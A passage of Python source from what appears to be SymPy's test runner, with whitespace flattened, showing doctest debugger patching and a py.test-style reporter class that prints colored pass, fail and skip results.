save_set_trace = pdb.set_trace self.debugger = pdoctest._OutputRedirectingPdb(save_stdout) self.debugger.reset() pdb.set_trace = self.debugger.set_trace # Patch linecache.getlines, so we can see the example's source # when we're inside the debugger. self.save_linecache_getlines = pdoctest.linecache.getlines linecache.getlines = self.__patched_linecache_getlines try: return self.__run(test, compileflags, out) finally: sys.stdout = save_stdout pdb.set_trace = save_set_trace linecache.getlines = self.save_linecache_getlines if clear_globs: test.globs.clear() # We have to override the name mangled methods. SymPyDocTestRunner._SymPyDocTestRunner__patched_linecache_getlines = \ DocTestRunner._DocTestRunner__patched_linecache_getlines SymPyDocTestRunner._SymPyDocTestRunner__run = DocTestRunner._DocTestRunner__run SymPyDocTestRunner._SymPyDocTestRunner__record_outcome = \ DocTestRunner._DocTestRunner__record_outcome class Reporter(object): """ Parent class for all reporters. """ pass class PyTestReporter(Reporter): """ Py.test like reporter. Should produce output identical to py.test. """ def __init__(self, verbose=False, tb="short", colors=True): self._verbose = verbose self._tb_style = tb self._colors = colors self._xfailed = 0 self._xpassed = [] self._failed = [] self._failed_doctest = [] self._passed = 0 self._skipped = 0 self._exceptions = [] # this tracks the x-position of the cursor (useful for positioning # things on the screen), without the need for any readline library: self._write_pos = 0 self._line_wrap = False def root_dir(self, dir): self._root_dir = dir def write(self, text, color="", align="left", width=80): """ Prints a text on the screen. It uses sys.stdout.write(), so no readline library is necessary. color ... choose from the colors below, "" means default color align ... left/right, left is a normal print, right is aligned on the right hand side of the screen, filled with " " if necessary width ... the screen width """ color_templates = ( ("Black" , "0;30"), ("Red" , "0;31"), ("Green" , "0;32"), ("Brown" , "0;33"), ("Blue" , "0;34"), ("Purple" , "0;35"), ("Cyan" , "0;36"), ("LightGray" , "0;37"), ("DarkGray" , "1;30"), ("LightRed" , "1;31"), ("LightGreen" , "1;32"), ("Yellow" , "1;33"), ("LightBlue" , "1;34"), ("LightPurple" , "1;35"), ("LightCyan" , "1;36"), ("White" , "1;37"), ) colors = {} for name, value in color_templates: colors[name] = value c_normal = '\033[0m' c_color = '\033[%sm' if align == "right": if self._write_pos+len(text) > width: # we don't fit on the current line, create a new line self.write("\n") self.write(" "*(width-self._write_pos-len(text))) if hasattr(sys.stdout, 'isatty') and not sys.stdout.isatty(): # the stdout is not a terminal, this for example happens if the # output is piped to less, e.g. "bin/test | less". In this case, # the terminal control sequences would be printed verbatim, so # don't use any colors. color = "" if sys.platform == "win32": # Windows consoles don't support ANSI escape sequences color = "" if self._line_wrap: if text[0] != "\n": sys.stdout.write("\n") if color == "": sys.stdout.write(text) else: sys.stdout.write("%s%s%s" % (c_color % colors[color], text, c_normal)) sys.stdout.flush() l = text.rfind("\n") if l == -1: self._write_pos += len(text) else: self._write_pos = len(text)-l-1 self._line_wrap = self._write_pos >= width self._write_pos %= width def write_center(self, text, delim="="): width = 80 if text != "": text = " %s " % text idx = (width-len(text)) // 2 t = delim*idx + text + delim*(width-idx-len(text)) self.write(t+"\n") def write_exception(self, e, val, tb): t = traceback.extract_tb(tb) # remove the first item, as that is always runtests.py t = t[1:] t = traceback.format_list(t) self.write("".join(t)) t = traceback.format_exception_only(e, val) self.write("".join(t)) def start(self, seed=None): self.write_center("test process starts") executable = sys.executable v = tuple(sys.version_info) python_version = "%s.%s.%s-%s-%s" % v self.write("executable: %s (%s)\n" % (executable, python_version)) from .misc import ARCH self.write("architecture: %s\n" % ARCH) from sympy.polys.domains import GROUND_TYPES self.write("ground types: %s\n" % GROUND_TYPES) if seed is not None: self.write("random seed: %d\n\n" % seed) self._t_start = clock() def finish(self): self._t_end = clock() self.write("\n") global text, linelen text = "tests finished: %d passed, " % self._passed linelen = len(text) def add_text(mytext): global text, linelen """Break new text if too long.""" if linelen + len(mytext) > 80: text += '\n' linelen = 0 text += mytext linelen += len(mytext) if len(self._failed) > 0: add_text("%d failed, " % len(self._failed)) if len(self._failed_doctest) > 0: add_text("%d failed, " % len(self._failed_doctest)) if self._skipped > 0: add_text("%d skipped, " % self._skipped) if self._xfailed > 0: add_text("%d expected to fail, " % self._xfailed) if len(self._xpassed) > 0: add_text("%d expected to fail but passed, " % len(self._xpassed)) if len(self._exceptions) > 0: add_text("%d exceptions, " % len(self._exceptions)) add_text("in %.2f seconds" % (self._t_end - self._t_start)) if len(self._xpassed) > 0: self.write_center("xpassed tests", "_") for e in self._xpassed: self.write("%s:%s\n" % (e[0], e[1])) self.write("\n") if self._tb_style != "no" and len(self._exceptions) > 0: #self.write_center("These tests raised an exception", "_") for e in self._exceptions: filename, f, (t, val, tb) = e self.write_center("", "_") if f is None: s = "%s" % filename else: s = "%s:%s" % (filename, f.__name__) self.write_center(s, "_") self.write_exception(t, val, tb) self.write("\n") if self._tb_style != "no" and len(self._failed) > 0: #self.write_center("Failed", "_") for e in self._failed: filename, f, (t, val, tb) = e self.write_center("", "_") self.write_center("%s:%s" % (filename, f.__name__), "_") self.write_exception(t, val, tb) self.write("\n") if self._tb_style != "no" and len(self._failed_doctest) > 0: #self.write_center("Failed", "_") for e in self._failed_doctest: filename, msg = e self.write_center("", "_") self.write_center("%s" % filename, "_") self.write(msg) self.write("\n") self.write_center(text) ok = len(self._failed) == 0 and len(self._exceptions) == 0 and \ len(self._failed_doctest) == 0 if not ok: self.write("DO *NOT* COMMIT!\n") return ok def entering_filename(self, filename, n): rel_name = filename[len(self._root_dir)+1:] self._active_file = rel_name self._active_file_error = False self.write(rel_name) self.write("[%d] " % n) def leaving_filename(self): if self._colors: self.write(" ") if self._active_file_error: self.write("[FAIL]", "Red", align="right") else: self.write("[OK]", "Green", align="right") self.write("\n") if self._verbose: self.write("\n") def entering_test(self, f): self._active_f = f if self._verbose: self.write("\n"+f.__name__+" ") def test_xfail(self): self._xfailed += 1 self.write("f", "Green") def test_xpass(self, fname): self._xpassed.append((self._active_file, fname)) self.write("X", "Green") def test_fail(self, exc_info): self._failed.append((self._active_file, self._active_f, exc_info)) self.write("F", "Red") self._active_file_error = True def doctest_fail(self, name, error_msg): # the first line contains "******", remove it: error_msg = "\n".join(error_msg.split("\n")[1:]) self._failed_doctest.append((name, error_msg)) self.write("F", "Red") self._active_file_error = True def test_pass(self): self._passed += 1 if self._verbose: self.write("ok", "Green") else: self.write(".", "Green") def test_skip(self, v): self._skipped += 1 self.write("s", "Green") if self._verbose: self.write(" - ", "Green") self.write(v.message, "Green") def test_exception(self, exc_info): self._exceptions.append((self._active_file, self._active_f, exc_info)) self.write("E", "Red") self._active_file_error = True def import_error(self, filename, exc_info): self._exceptions.append((filename, None, exc_info)) rel_name = filename[len(self._root_dir)+1:] self.write(rel_name) self.write("[?] Failed to import", "Red") if self._colors: self.write(" ") self.write("[FAIL]", "Red", align="right") self.write("\n") sympy_dir = get_sympy_dir()
agpl-3.0